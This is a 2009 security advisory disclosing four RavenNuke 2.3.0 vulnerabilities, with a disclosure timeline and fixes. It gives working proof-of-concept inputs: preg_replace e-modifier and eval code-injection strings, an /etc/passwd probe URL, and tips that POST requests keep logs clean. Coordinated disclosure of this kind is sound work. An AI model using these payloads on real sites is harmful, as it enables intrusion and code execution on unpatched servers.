[waraxe-2009-SA#072] - Multiple Vulnerabilities in RavenNuke 2.3.0=0D
================================================================================0D
=0D
Author: Janek Vind "waraxe"=0D
Date: 16. February 2009=0D
Location: Estonia, Tartu=0D
Web: http://www.waraxe.us/advisory-72.html=0D 
=0D
=0D
Description of vulnerable software:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
RavenNuke is a web-based automated news publishing and content management=0D
system based on PHP and MySQL. The system is fully controlled using a web-based=0D
graphical user interface (GUI). RavenNuke is an extensively changed fork of =0D
the phpNuke\portal system.=0D
=0D
http://ravenphpscripts.com/=0D 
=0D
=0D
List of found vulnerabilities=0D
================================================================================0D
=0D
1. Remote Php Code Execution in "avatarlist.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Security risk: High=0D
=0D
Reasons:=0D
  1. uninitialized arrays "patterns" and "replacements"=0D
Preconditions:=0D
  1. attacker must be logged in as user=0D
Comments:=0D
  1. Exploit is using "preg_replace" e-modifier=0D
  2. "register_globals" setting does not matter=0D
  3. Sentinel will not stop this exploit=0D
  4. POST method will leave clean logs in most real-world cases=0D
=0D
Test using GET method:=0D
=0D
http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist=0D 
&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()=0D
=0D
Test using POST method:=0D
------------------------------------------------------------=0D
=0D
action="http://localhost/ravennuke230/modules.php?=0D 
name=Your_Account&op=avatarlist" method="post">=0D
=0D
=0D
=0D
=0D
=0D
=0D
------------------------------------------------------------=0D
=0D
Fragment of vulnerable source code:=0D
------------------------------------------------------------=0D
$patterns[0] = '/\.gif/';=0D
$patterns[1] = '/\.png/';=0D
...=0D
$replacements[1] = '';=0D
$replacements[0] = '';=0D
...=0D
$entryname = preg_replace($patterns, $replacements, $entry);=0D
------------------------------------------------------------=0D
=0D
Solution: initialize arrays before use.=0D
=0D
=0D
2. Remote Php Code Execution in "Your Account" module=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Security risk: medium=0D
=0D
Reasons:=0D
  1. insecure use of "eval()" php function=0D
Precoditions:=0D
  1. Attacker must have admin rights for "Your Account" in=0D
  order to change custom fields=0D
Comments:=0D
  1. This is privilege escalation vulnerability=0D
=0D
Test:=0D
=0D
1. log in as admin and go to "Custom Fields" in users administration:=0D
=0D
http://localhost/ravennuke230/admin.php?op=yaCustomFields=0D 
=0D
2. insert "_Z;phpinfo()" (without quotes) into input box "ID Field Name"=0D
=0D
3. click "Save fields"=0D
=0D
4. now go to "Users":=0D
=0D
http://localhost/ravennuke230/admin.php?op=yaUsers=0D 
=0D
and select "User Details" for any user, click "OK".=0D
Resulting page will display output of the "phpinfo()", done :)=0D
=0D
Fragment of vulnerable source code:=0D
-------------------------------------------------------=0D
/* Get Custom Fields and display them in desired order=0D
...=0D
$result = $db->sql_query('SELECT * FROM ' . $user_prefix . '_users_fields=0D
 WHERE need <> "0" AND public="1" ORDER BY pos');=0D
...=0D
while ($sqlvalue = $db->sql_fetchrow($result)) {=0D
  if (substr($sqlvalue['name'], 0, 1) == '_') =0D
@eval('$name_exit = ' . $sqlvalue['name'] . ';');=0D
-------------------------------------------------------=0D
=0D
=0D
3. Sql Injection in "Resend_Email" module=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Security risk: medium=0D
=0D
Reasons:=0D
  1. Insecure use of "extract()" php function=0D
Preconditions:=0D
  1. attacker must be logged in as admin=0D
=0D
Comments:=0D
  1. This is privilege escalation vulnerability=0D
  2. POST method will leave clean logs in most real-world cases=0D
=0D
Test using POST method:=0D
------------------------------------------------------------=0D
=0D
action="http://localhost/ravennuke230/modules.php=0D 
?name=Resend_Email" method="post">=0D
=0D
=0D
=0D
=0D
------------------------------------------------------------=0D
=0D
Fragment of vulnerable source code:=0D
------------------------------------------------------------=0D
if (!is_admin($admin)) endit(_ACCESSDENIED);=0D
...=0D
extract($HTTP_POST_VARS);=0D
...=0D
$result = $db->sql_query('select user_id, username, user_email, user_password,=0D
user_regdate, check_num, time, requestor from '.$user_prefix.'_users_temp');=0D
------------------------------------------------------------=0D
=0D
Solution: use EXTR_SKIP to avoid overwriting of existing variables=0D
=0D
=0D
4. Remote Detection of Local Files in "captcha.php"=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
Security risk: low=0D
=0D
Reasons:=0D
  1. uninitialized array "aFonts"=0D
Preconditions:=0D
  1. "register_globals=on"=0D
  2. "display_errors=on"=0D
Comments:=0D
  1. multiple page refreshes may needed because of source code specifics=0D
  2. same method works for remote directories too!=0D
=0D
Attacker is able to detect existance of remote files or directories=0D
via different error messages, emitted by php.=0D
=0D
Test 1:=0D
=0D
http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/waraxe=0D 
=0D
Result:=0D
=0D
Warning: imageftbbox() [function.imageftbbox]: Invalid font filename in=0D
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298=0D
=0D
"Invalid font filename" --> file does not exist=0D
=0D
One more possible error message:=0D
=0D
Warning: imageftbbox(): Could not find/open font in ...=0D
=0D
"Could not find/open font" --> file does not exist=0D
=0D
=0D
Test 2:=0D
=0D
http://localhost/ravennuke230/images/captcha.php?aFonts[]=/etc/passwd=0D 
=0D
Result:=0D
=0D
Warning: imageftbbox() [function.imageftbbox]: Could not read font in=0D
C:\apache_wwwroot\ravennuke230\includes\class.php-captcha.php on line 298=0D
=0D
"Could not read font" --> file exists=0D
=0D
=0D
How to fix:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Upgrade to new version 2.30.01=0D
=0D
=0D
Disclosure Timeline:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
01/16/09 Developer contacted=0D
01/16/09 Developer's initial response=0D
01/17/09 Fidings sent to developer=0D
02/15/09 Patched version 2.30.01 released by developer=0D
02/16/09 Public disclosure=0D
=0D
=0D
Greetings:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,=0D
to all active waraxe.us forum members and to anyone else who know me!=0D
=0D
=0D
Contact:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
come2waraxe@yahoo.com=0D 
Janek Vind "waraxe"=0D
=0D
Waraxe forum: http://www.waraxe.us/forums.html=0D 
Personal homepage: http://www.janekvind.com/=0D 
=0D
---------------------- [ EOF ] ------------------------------=0D